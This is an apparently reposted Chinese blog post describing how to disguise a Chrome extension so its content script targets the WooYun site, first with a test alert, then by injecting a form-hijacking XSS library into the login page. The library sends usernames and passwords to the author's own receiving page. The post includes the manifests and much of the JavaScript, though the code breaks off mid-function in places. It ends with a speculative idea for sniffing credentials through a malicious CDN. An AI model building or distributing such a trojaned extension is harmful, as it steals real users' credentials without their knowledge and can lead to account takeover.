0x00 Chrome插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法如下:
Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里呢?
于是,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:
{
"name": "XiaoChaJian",
"version": "1.0",
"manifest_version": 2,
"author":"VIP",
"icons": {
"128": "icon.png"
},
"permissions": [
"tabs","http://*/*","https://*/*"
],
"content_scripts": [
{"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}
]
}
contentscript.js内容:
alert(/xss/);
那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?
开始实践:
Manifest.json内容:
{
"name": "JieChiBiaoDan",
"version": "1.0",
"manifest_version": 2,
"author":"VIP",
"icons": {
"128": "icon.png"
},
"permissions": [
"tabs","http://*/*","https://*/*"
],
"content_scripts": [
{"js":["contentscript.js"],"matches":
["http://wooyun.org/user.php?
action=login*","http://www.wooyun.org/user.php?action=login*"]}
]
}
contentscript.js内容:
;;var xss = function(){
var x = {
'name':'xss.js',
'version':'0.2.1',
'author':'长短短(sogili)'
};
x.x=function(id){return document.getElementById(id)};
//容错取值
x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};
//浏览器
x.i={
i:!!self.ActiveXObject&&(function(){
for(var v=6,s=document.createElement('s');
s.innerHTML='',
s.getElementsByTagName('i')[0];);
return v;
}()),
c:!!self.chrome,
f:self.mozPaintCount>-1,
o:!!self.opera,
s:!self.chrome&&!!self.WebKitPoint
};
//UA
x.ua = navigator.userAgent;
//判断是否为苹果手持设备
x.apple=/ip(one|ad|od)/i.test(x.ua);
//随机数
x.rdm=function(){return~~(Math.random()*1e5)};
//url编码(UTF8)
x.ec=encodeURIComponent;
x.html=function(){
return document.getElementsByTagName('html')[0]
||document.write('')
||document.getElementsByTagName
('html')[0];
};
/*
* 销毁一个元素
*/
x.kill=function(e){
e.parentElement.removeChild(e);
};
/*
*绑定事件
*/
x.bind=function(e,name,fn){
e.addEventListener?e.addEventListener
(name,fn,false):e.attachEvent("on"+name,fn);
};
/*
* dom准备完毕时执行函数
*/
x.ready=function(fn){
if(!x.i.i){
x.bind(document,'DOMContentLoaded',fn);
}else{
var s = setInterval(function(){
try{
document.body.doScroll('left');
clearInterval(s);
fn();
}catch(e){}
},4);
}
}
/*
* 同源检测
*/
x.o=function(url){
var link = x.dom('',1);
return link.protocol+link.hoatname+':'+(link.port||80)
==location.protocol+location.hoatname+':'+(location.port||80);
};
/*
* html to dom
*/
x.dom=function(html,gcsec){
var tmp = document.createElement('span');
tmp.innerHTML=html;
var e = tmp.children[0];
e.style.display='none';
x.html().appendChild(e);
gcsec>>0>0&&setTimeout(function(){
x.kill(e);
},gcsec*1000);
return e;
};
/*
* ajax
*/
x.ajax=function(url,params,callback){
(params instanceof Function)&&
(callback=params,params=void(0));
var XHR = (!x.o(url)&&window.XDomainRequest)||
window.XMLHttpRequest||
(function(){return new ActiveXObject
('MSXML2.XMLHTTP')});
var xhr = new XHR();
xhr.open(params?'post':'get',url);
xhr.withCredentials = true;
try{params&&xhr.setRequestHeader('content-
type','application/x-www-form-urlencoded');}catch(e){}
callback&&(xhr.onreadystatechange = function() {
(this.readyState == 4 && ((this.status >= 200
&& this.status ');
form.action=url;
for(var name in params){
var input = document.createElement
('input');
input.name=name;
input.value=params[name];
form.appendChild(input);
}
var iframe = x.dom('
http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:
开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。
再去看看,用户名密码已经躺在那里了。
在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。
0x01 CDN
---------------
现在有许许多多的网站使用了CDN来进行加速/防D等。
去搜索了下CDN的工作原理,大概是这样的。
用户访问-》自动分配最快的节点-》请求原服务器-------
返回给用户《-返回给节点服务器《-原服务器返回数据
那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?
这个就没办法实践了,去搜索了一个相关案例:
http://wooyun.org/bugs/wooyun-2010-016562
更多猥琐想法欢迎补充~
文章来源于lcx.cc:利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践
在好莱坞电影里,黑客总给人留下神秘莫测的印象。他们没有名字,也看不到脸,总是躲在昏暗的地下室里,飞快地敲打着键盘,把一个个的安全堡垒攻陷。可是大多数人对传统的“黑帽”黑客—即利用黑客技能谋生或玩恶作剧的人之生活却知之甚少。 在 Reddit的/r/netsec…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论